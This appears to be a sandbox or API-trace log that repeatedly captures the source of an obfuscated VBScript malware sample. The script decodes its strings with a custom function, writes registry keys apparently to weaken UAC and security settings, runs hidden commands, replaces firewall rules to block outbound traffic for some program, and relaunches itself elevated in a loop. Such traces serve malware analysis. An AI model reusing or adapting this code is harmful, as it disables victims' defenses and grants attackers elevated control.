CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.295] wcsncmp (_String1=" = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.295] wcsncmp (_String1="= 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.295] wcsncmp (_String1=" 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.295] wcsncmp (_String1="0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0226.295] wcsncmp (_String1="\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = 